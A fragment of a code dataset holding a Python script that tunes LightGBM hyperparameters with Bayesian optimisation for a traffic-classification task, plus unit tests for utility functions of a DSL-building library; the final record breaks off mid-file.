"name"}, {"api_name": "cciw.officers.models.Invitation.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "cciw.officers.models.Invitation.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Invitation", "line_number": 55, "usage_type": "name"}, {"api_name": "cciw.officers.models.Application.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "cciw.officers.models.Application.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "cciw.officers.models.Reference.objects.select_related", "line_number": 61, "usage_type": "call"}, {"api_name": "cciw.officers.models.Reference.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Reference", "line_number": 61, "usage_type": "name"}, {"api_name": "cciw.officers.models.DBSCheck.objects.filter", "line_number": 63, "usage_type": "call"}, {"api_name": "cciw.officers.models.DBSCheck.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.DBSCheck", "line_number": 63, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 78, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 80, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 82, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 161, "usage_type": "name"}, {"api_name": "cciw.utils.spreadsheet.ExcelSimpleBuilder", "line_number": 162, "usage_type": "call"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 170, "usage_type": "call"}]} +{"seq_id": "28695557447", "text": "import numpy as np\r\nimport pandas as pd\r\nimport xgboost as xgb\r\nimport lightgbm\r\nfrom sklearn.model_selection import StratifiedKFold, KFold\r\nfrom sklearn.metrics import f1_score, log_loss\r\nfrom bayes_opt import BayesianOptimization\r\n\"\"\" ====================== Function definitions ========================== \"\"\"\r\ndef BayesianSearch(clf, params):\r\n \"\"\"贝叶斯优化器\"\"\"\r\n # 迭代次数\r\n num_iter = 25\r\n init_points = 5\r\n # 创建一个贝叶斯优化对象,输入为自定义的模型评估函数与超参数的范围\r\n bayes = BayesianOptimization(clf, params)\r\n # 开始优化\r\n bayes.maximize(init_points=init_points, n_iter=num_iter)\r\n # 输出结果\r\n params = bayes.res['max']\r\n print(params['max_params'])\r\n \r\n return params\r\n\r\ndef GBM_evaluate(min_child_samples, min_child_weight, colsample_bytree, max_depth, subsample, reg_alpha, reg_lambda):\r\n \"\"\"自定义的模型评估函数\"\"\"\r\n\r\n # 模型固定的超参数\r\n param = {\r\n 'objective': 'regression',\r\n 'n_estimators': 275,\r\n 'metric': 'rmse',\r\n 'random_state': 2020}\r\n\r\n # 贝叶斯优化器生成的超参数\r\n param['min_child_weight'] = int(min_child_weight)\r\n param['colsample_bytree'] = float(colsample_bytree),\r\n param['max_depth'] = int(max_depth),\r\n param['subsample'] = float(subsample),\r\n param['reg_lambda'] = float(reg_lambda),\r\n param['reg_alpha'] = float(reg_alpha),\r\n param['min_child_samples'] = int(min_child_samples)\r\n\r\n # 5-flod 交叉检验,注意BayesianOptimization会向最大评估值的方向优化,因此对于回归任务需要取负数。\r\n # 这里的评估函数为neg_mean_squared_error,即负的MSE。\r\n val = cross_val_score(lgb.LGBMRegressor(**param),\r\n train_X, train_y ,scoring='neg_mean_squared_error', cv=5).mean()\r\n\r\n return val\r\n\r\ndef LGB(params, train_x, train_y):\r\n predictors = list(train_x.columns)\r\n train_x = train_x.values\r\n folds = 5\r\n seed = 202\r\n kf = StratifiedKFold(n_splits = folds, shuffle = True, random_state = seed)\r\n #kf = KFold(n_splits = folds, shuffle = True, random_state = seed)\r\n train = np.zeros((train_x.shape[0], 3))\r\n test = np.zeros((test_x.shape[0], 3))\r\n test_pre = np.zeros((folds, test_x.shape[0], 3))\r\n test_pre_all = np.zeros((folds, test_x.shape[0]))\r\n cv_scores = []\r\n f1_scores = []\r\n cv_rounds = []\r\n\r\n for i, (train_index, verify_index) in enumerate(kf.split(train_x, train_y)):\r\n tr_x = train_x[train_index]\r\n tr_y = train_y[train_index]\r\n ve_x = train_x[verify_index]\r\n ve_y = train_y[verify_index]\r\n\r\n train_matrix = lightgbm.Dataset(tr_x, label = tr_y)\r\n verify_matrix = lightgbm.Dataset(ve_x, label = ve_y)\r\n\r\n num_round = 6000\r\n early_stopping_rounds = 1000\r\n if verify_matrix:\r\n model = lightgbm.train(params, train_matrix, num_round, \r\n valid_sets = verify_matrix, \r\n verbose_eval = 50,\r\n early_stopping_rounds = early_stopping_rounds\r\n )\r\n verify_res = model.predict(ve_x, \r\n num_iteration = model.best_iteration\r\n )\r\n pred = model.predict(test_x, num_iteration = model.best_iteration)\r\n train[verify_index] = verify_res\r\n test_pre[i, :] = pred\r\n pre_y = np.argmax(verify_res, axis = 1)\r\n f1_list = f1_score(ve_y, pre_y, average = None)\r\n f1 = 0.2*f1_list[0] + 0.2*f1_list[1] + 0.6*f1_list[2]\r\n \r\n f1_scores.append(f1)\r\n test_pre_all[i, :] = np.argmax(pred, axis=1)\r\n\r\n f1_mean = np.mean(f1_scores)\r\n\r\n return f1_mean\r\n\r\ndef lgb_cv(feature_fraction,bagging_fraction,bagging_freq,learning_rate,num_leaves,min_child_weight,\r\n min_data_in_leaf,max_depth,min_split_gain,lambda_l2,num_iterations=5000):\r\n params = {\r\n 'boosting_type': 'gbdt',\r\n 'objective':'multiclass',\r\n 'metric':'multi_logloss',\r\n 'nthread': 6,'num_class':3,'verbose': -1,}\r\n\r\n params['min_child_weight'] = max(min_child_weight, 0)\r\n params[\"num_leaves\"] = int(round(num_leaves))\r\n params['lambda_l2'] = max(lambda_l2, 0)\r\n params['feature_fraction'] = max(min(feature_fraction, 1), 0)\r\n params['bagging_fraction'] = max(min(bagging_fraction, 1), 0)\r\n params['bagging_freq'] = int(round(bagging_freq))\r\n params['learning_rate'] = max(min(learning_rate, 1), 0)\r\n params[\"min_data_in_leaf\"] = int(round(min_data_in_leaf))\r\n params['max_depth'] = int(round(max_depth))\r\n params['min_split_gain'] = min_split_gain\r\n \r\n f1_result = LGB(params, train_x, train_y)\r\n return f1_result\r\n\r\n\"\"\" ======================= Load Training Data ======================= \"\"\"\r\npath = \"I:/TianChi/data/\" #存放数据的地址\r\nresult_path = \"I:/TianChi/data/\" #存放数据的地址\r\ntrain_json = pd.read_json(path + \"train_target.json\")\r\ntest_json = pd.read_json(path + \"test_target.json\")\r\n\r\ntrain_features = pd.read_csv(path + 'train_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntest_features = pd.read_csv(path + 'test_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntrain_df = pd.read_csv(path + 'train_feature3000_timecn_new.csv')\r\ntest_df = pd.read_csv(path + 'test_feature3000_timecn_new.csv')\r\nX = pd.read_csv(path + 'train_feature3000_fromJ.csv')\r\nX_test = pd.read_csv(path + 'test_feature3000_fromJ.csv')\r\n\r\n\"\"\" ====================== Variable Declaration ========================== \"\"\"\r\nselect_features = [\r\n \"rate1_mean\",\r\n \"rate1_std\",\r\n \"rate2_mean\",\r\n \"rate2_std\",\r\n \"number1_mean\",\r\n \"number1_std\",\r\n \"number2_mean\",\r\n \"number2_std\",\r\n 'square_mean', \r\n 'square_std',\r\n #'number_mean', \r\n #'number_std',\r\n 'car1_mean',\r\n 'car2_mean',\r\n 'truck1_mean',\r\n 'truck2_mean',\r\n #'bus1_mean',\r\n #'bus2_mean',\r\n #'motorbike1_mean',\r\n #'motorbike2_mean',\r\n #'bicycle1_mean',\r\n #'bicycle2_mean',\r\n \"gap_mean\",\r\n \"gap_std\",\r\n \"hour_mean\",\r\n \"minute_mean\",\r\n \"dayofweek_mean\",\r\n \"gap_time_today_mean\",\r\n \"gap_time_today_std\",\r\n '1','2','3',\r\n #\"im_diff_mean_mean\",\"im_diff_mean_std\",\"im_diff_std_mean\",\"im_diff_std_std\",\r\n ]\r\n\r\ntrain_features['number1'] = train_features['car1'] + train_features['truck1'] + train_features['bus1'] + train_features['motorbike1'] + train_features['bicycle1']\r\ntrain_features['number2'] = train_features['car2'] + train_features['truck2'] + train_features['bus2'] + train_features['motorbike2'] + train_features['bicycle2']\r\ntest_features['number1'] = test_features['car1'] + test_features['truck1'] + test_features['bus1'] + test_features['motorbike1'] + test_features['bicycle1']\r\ntest_features['number2'] = test_features['car2'] + test_features['truck2'] + test_features['bus2'] + test_features['motorbike2'] + test_features['bicycle2']\r\n\r\ntrain_features['square'] = train_features['rate1'] + train_features['rate2']\r\ntest_features['square'] = test_features['rate1'] + test_features['rate2']\r\ntrain_features['number'] = train_features['number1'] + train_features['number2']\r\ntest_features['number'] = test_features['number1'] + test_features['number2']\r\n\r\ntrain_features = train_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\n\r\ntest_features = test_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\ntrain_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n #'1','2','3','4','5','6','7','8','9','10','11',\r\n \"label\"]\r\ntest_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n \"label\"]\r\n'''\r\ntrain_df = get_data(train_json[:],\"amap_traffic_train_0712\")\r\ntest_df = get_data(test_json[:],\"amap_traffic_test_0712\")\r\ntest_df.to_csv(path_or_buf = path + 'test_feature_timecn_new.csv')\r\ntrain_df.to_csv(path_or_buf = path + 'train_feature_timecn_new.csv')\r\n'''\r\n\r\ntrain_features = pd.concat([train_features, train_df, X], axis = 1)\r\ntest_features = pd.concat([test_features, test_df, X_test], axis = 1)\r\n\r\ntrain_features[\"label\"] = train_features[\"label\"].apply(int)\r\ntest_features[\"label\"] = test_features[\"label\"].apply(int)\r\n\r\n\r\ntrain_x = train_features[select_features].copy()\r\ntrain_y = train_features[\"label\"]\r\ntest_x = test_features[select_features].copy()\r\n\r\n\"\"\" ====================== Random Search ========================== \"\"\"\r\nbounds = {\r\n 'min_child_weight': (1,10),\r\n 'num_leaves': (8, 150),\r\n 'lambda_l2': (0, 50),\r\n #'lambda_l1': (0, 50),\r\n 'feature_fraction': (0.2, 1),\r\n 'bagging_fraction': (0.2, 1),\r\n 'bagging_freq': (1, 100),\r\n 'learning_rate': (0.01, 1),\r\n 'min_data_in_leaf': (1,20),\r\n 'max_depth': (3, 30),\r\n 'min_split_gain': (0, 50),\r\n \r\n }\r\nlgb_bo = BayesianOptimization(lgb_cv, bounds, random_state = 1111)\r\n\r\nlgb_bo.maximize(init_points = 10, n_iter = 100)\r\nbest = lgb_bo.max\r\na = 0", "repo_name": "liuzexi256/GaodeMAP", "sub_path": "BayesOpt.py", "file_name": "BayesOpt.py", "file_ext": "py", "file_size_in_byte": 12329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bayes_opt.BayesianOptimization", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 71, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 72, "usage_type": "call"}, {"api_name": "lightgbm.train", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 225, "usage_type": "call"}, {"api_name": "bayes_opt.BayesianOptimization", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "9987164383", "text": "# -*- coding: utf-8 -*-\n#! \\file ./tests/test_support/test_utils.py\n#! \\author Jiří Kučera, \n#! \\stamp 2014-04-10 20:58:24 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nDoIt! utilities tests.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport time\nimport unittest\n\nfrom ..common import RAISE_FROM_ENTER, SUPRESS, ContextManagerMock, \\\n ModuleContext\n\nfrom doit.support.errors import DoItAssertionError\n\nfrom doit.support.utils import \\\n ordinal_suffix, deep_eq, timestamp, \\\n Functor, WithStatementExceptionHandler, Collection\n\nclass Struct(object):\n __slots__ = [ '__kwargs' ]\n\n def __init__(self, **kwargs):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n setattr(self, _('__kwargs'), kwargs)\n #-def\n\n def __getattr__(self, value):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n kwargs = object.__getattribute__(self, _('__kwargs'))\n if value in kwargs:\n return kwargs[value]\n object.__getattribute__(self, value)\n #-def\n#-class\n\nclass TimeModuleMock(ModuleContext):\n __slots__ = [\n '__old_localtime',\n '__old_timezone'\n ]\n\n def __init__(self, env):\n ModuleContext.__init__(self, env)\n self.__old_localtime = time.localtime\n self.__old_timezone = time.timezone\n #-def\n\n def replace(self, env):\n def _localtime():\n return Struct(\n tm_year = env['year'],\n tm_mon = env['month'],\n tm_mday = env['day'],\n tm_hour = env['hour'],\n tm_min = env['min'],\n tm_sec = env['sec'],\n tm_isdst = env['isdst']\n )\n self.__old_localtime = time.localtime\n self.__old_timezone = time.timezone\n time.localtime = _localtime\n time.timezone = env['tz']\n #-def\n\n def restore(self):\n time.localtime = self.__old_localtime\n time.timezone = self.__old_timezone\n #-def\n#-class\n\nclass FunctorA(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass FunctorB(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass TestOrdinalSuffixCase(unittest.TestCase):\n\n def test_ordinal_suffix(self):\n cases = [\n (0, 'th'),\n (1, 'st'),\n (2, 'nd'),\n (3, 'rd'),\n (4, 'th'),\n (5, 'th'),\n (10, 'th'),\n (11, 'th'),\n (12, 'th'),\n (13, 'th'),\n (14, 'th'),\n (15, 'th'),\n (20, 'th'),\n (21, 'st'),\n (22, 'nd'),\n (23, 'rd'),\n (24, 'th'),\n (25, 'th'),\n (30, 'th'),\n (31, 'st'),\n (32, 'nd'),\n (33, 'rd'),\n (34, 'th'),\n (35, 'th'),\n (50, 'th'),\n (51, 'st'),\n (52, 'nd'),\n (53, 'rd'),\n (54, 'th'),\n (55, 'th'),\n (90, 'th'),\n (91, 'st'),\n (92, 'nd'),\n (93, 'rd'),\n (94, 'th'),\n (95, 'th')\n ]\n bases = [0, 100, 1000, 10000, 1000000]\n\n for b in bases:\n for c in cases:\n self.assertEqual(ordinal_suffix(b + c[0]), c[1])\n self.assertEqual(ordinal_suffix(-(b + c[0])), c[1])\n #-def\n#-class\n\nclass TestDeepEqCase(unittest.TestCase):\n\n def test_deep_eq(self):\n x1 = lambda x: x\n\n self.assertTrue(x1, x1)\n\n self.assertTrue(deep_eq([], []))\n self.assertTrue(deep_eq([], ()))\n self.assertTrue(deep_eq((), []))\n self.assertTrue(deep_eq((), ()))\n\n self.assertFalse(deep_eq({}, ()))\n self.assertFalse(deep_eq([], {}))\n self.assertTrue(deep_eq({}, {}))\n\n self.assertTrue(deep_eq([[]], [()]))\n self.assertFalse(deep_eq([], [()]))\n\n self.assertTrue(deep_eq([[1, 2], [3]], [(1, 2), (3,)]))\n self.assertTrue(deep_eq([[1, 2], [3, (4, 5)]], [(1, 2), (3, [4, 5])]))\n self.assertFalse(deep_eq(\n [[1, 2], [3, (4, 5)]],\n [(1, 2), (3, [4, [5]])]\n ))\n\n self.assertTrue(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 0}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'x': 1}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1, 1: 1}))\n self.assertTrue(deep_eq(\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]}\n ))\n self.assertFalse(deep_eq(\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3, 4)})}]}\n ))\n\n self.assertTrue(deep_eq(1, 1))\n self.assertFalse(deep_eq(1, 2))\n #-def\n#-class\n\nclass TestTimeStampCase(unittest.TestCase):\n\n def test_dst(self):\n env = dict(\n year = 2008, month = 7, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = 1, tz = -5378\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 7)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '+')\n self.assertEqual(t['utchour'], 1)\n self.assertEqual(t['utcmin'], 29)\n self.assertEqual(t['utcsec'], 38)\n self.assertEqual(t['dsthour'], 1)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n\n def test_nodst(self):\n env = dict(\n year = 2008, month = 11, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = 0, tz = 5378\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 11)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '-')\n self.assertEqual(t['utchour'], 1)\n self.assertEqual(t['utcmin'], 29)\n self.assertEqual(t['utcsec'], 38)\n self.assertEqual(t['dsthour'], 0)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n\n def test_dst_not_avail(self):\n env = dict(\n year = 2008, month = 7, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = -1, tz = 14400\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 7)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '-')\n self.assertEqual(t['utchour'], 4)\n self.assertEqual(t['utcmin'], 0)\n self.assertEqual(t['utcsec'], 0)\n self.assertEqual(t['dsthour'], 0)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n#-class\n\nclass TestFunctorCase(unittest.TestCase):\n\n def test_equality(self):\n f1 = FunctorA(1, 2, c = 4)\n f2 = FunctorB(1, 2, c = 4)\n f3 = FunctorA(1, 2, 4)\n\n self.assertNotEqual(f1, f2)\n self.assertEqual(f1, f3)\n #-def\n#-class\n\nclass TestWithStatementExceptionHandlerCase(unittest.TestCase):\n\n def test_what_happen_when_exception_is_not_raised(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_from_enter(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(RAISE_FROM_ENTER)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_within_block(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_not_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n#-class\n\nclass TestCollectionCase(unittest.TestCase):\n\n def test_create_unique_objects(self):\n a = Collection('MyColl1')\n\n self.assertEqual(a.name, 'MyColl1')\n self.assertEqual(a.qname, 'MyColl1')\n\n b = Collection('MyColl1')\n\n self.assertEqual(b.name, 'MyColl1')\n self.assertEqual(b.qname, 'MyColl1')\n\n c = Collection('MyColl2')\n\n self.assertEqual(c.name, 'MyColl2')\n self.assertEqual(c.qname, 'MyColl2')\n\n d = Collection()\n e = Collection()\n\n self.assertIs(a, b)\n self.assertEqual(a.name, b.name)\n self.assertEqual(a.qname, b.qname)\n self.assertIsNot(a, c)\n self.assertNotEqual(a.name, c.name)\n self.assertNotEqual(a.qname, c.qname)\n self.assertIsNot(d, e)\n self.assertNotEqual(d.name, e.name)\n self.assertNotEqual(d.qname, e.qname)\n #-def\n\n def test_create_subobjects(self):\n Fruit = Collection('Fruit')\n\n self.assertEqual(Fruit.name, 'Fruit')\n self.assertEqual(Fruit.qname, 'Fruit')\n\n Apple = Fruit.Apple\n\n self.assertEqual(Apple.name, 'Apple')\n self.assertEqual(Apple.qname, 'Fruit.Apple')\n\n Orange = Fruit.Orange\n\n self.assertEqual(Orange.name, 'Orange')\n self.assertEqual(Orange.qname, 'Fruit.Orange')\n\n Banana = Fruit.Banana\n\n self.assertEqual(Banana.name, 'Banana')\n self.assertEqual(Banana.qname, 'Fruit.Banana')\n\n Vegetable = Collection('Vegetable')\n\n self.assertEqual(Vegetable.name, 'Vegetable')\n self.assertEqual(Vegetable.qname, 'Vegetable')\n\n Carrot = Vegetable.Carrot\n\n self.assertEqual(Carrot.name, 'Carrot')\n self.assertEqual(Carrot.qname, 'Vegetable.Carrot')\n\n Potato = Vegetable.Potato\n\n self.assertEqual(Potato.name, 'Potato')\n self.assertEqual(Potato.qname, 'Vegetable.Potato')\n\n Tomato = Vegetable.Tomato\n\n self.assertEqual(Tomato.name, 'Tomato')\n self.assertEqual(Tomato.qname, 'Vegetable.Tomato')\n\n Dairy = Collection('Dairy')\n\n self.assertEqual(Dairy.name, 'Dairy')\n self.assertEqual(Dairy.qname, 'Dairy')\n\n Cheese = Dairy.Cheese\n\n self.assertEqual(Cheese.name, 'Cheese')\n self.assertEqual(Cheese.qname, 'Dairy.Cheese')\n\n Chedar = Cheese.Chedar\n\n self.assertEqual(Chedar.name, 'Chedar')\n self.assertEqual(Chedar.qname, 'Dairy.Cheese.Chedar')\n\n ProceededChedar = Chedar.Proceeded\n\n self.assertEqual(ProceededChedar.name, 'Proceeded')\n self.assertEqual(\n ProceededChedar.qname, 'Dairy.Cheese.Chedar.Proceeded'\n )\n\n Ementaler = Cheese.Ementaler\n\n self.assertEqual(Ementaler.name, 'Ementaler')\n self.assertEqual(Ementaler.qname, 'Dairy.Cheese.Ementaler')\n\n Food = Collection(\n 'Food', 'Fruit', 'Vegetable', 'Dairy.Cheese.Chedar', 'Dairy.Cheese'\n )\n\n self.assertEqual(Food.name, 'Food')\n self.assertEqual(Food.qname, 'Food')\n self.assertIs(Apple, Food.Apple)\n self.assertIs(Orange, Food.Orange)\n self.assertIs(Banana, Food.Banana)\n self.assertIs(Carrot, Food.Carrot)\n self.assertIs(Potato, Food.Potato)\n self.assertIs(Tomato, Food.Tomato)\n self.assertIs(Chedar, Food.Chedar)\n self.assertIs(ProceededChedar, Food.Proceeded)\n self.assertIs(Food.Chedar.Proceeded, Food.Proceeded)\n self.assertIs(Ementaler, Food.Ementaler)\n #-def\n\n def test_contains_operator(self):\n A = Collection(\"A\")\n B = Collection(\"@\")\n\n self.assertNotIn(A, B)\n self.assertNotIn(B, A)\n self.assertIn(A, A)\n self.assertIn(B, B)\n self.assertIn(A.B, A)\n self.assertNotIn(A.B, A.C)\n self.assertIn(B.C.D.S, B.C)\n self.assertNotIn(B, B.A)\n self.assertNotIn(A.BCEF.G, A.BCE)\n self.assertIn(A.BCE.G, A.BCE)\n #-def\n\n def test_lock(self):\n with self.assertRaises(DoItAssertionError):\n Collection.lock()\n T = Collection(\"T\")\n with self.assertRaises(DoItAssertionError):\n Collection.unlock()\n T = Collection(\"T\")\n Collection.lock()\n t = T.Test\n #-def\n\n def test_unlock(self):\n Collection.lock()\n Collection.unlock()\n Test = Collection(\"Test\")\n t = Test.Test1\n #-def\n\n def tearDown(self):\n Collection.unlock()\n #-def\n#-class\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestOrdinalSuffixCase))\n suite.addTest(unittest.makeSuite(TestDeepEqCase))\n suite.addTest(unittest.makeSuite(TestTimeStampCase))\n suite.addTest(unittest.makeSuite(TestFunctorCase))\n suite.addTest(unittest.makeSuite(TestWithStatementExceptionHandlerCase))\n suite.addTest(unittest.makeSuite(TestCollectionCase))\n return 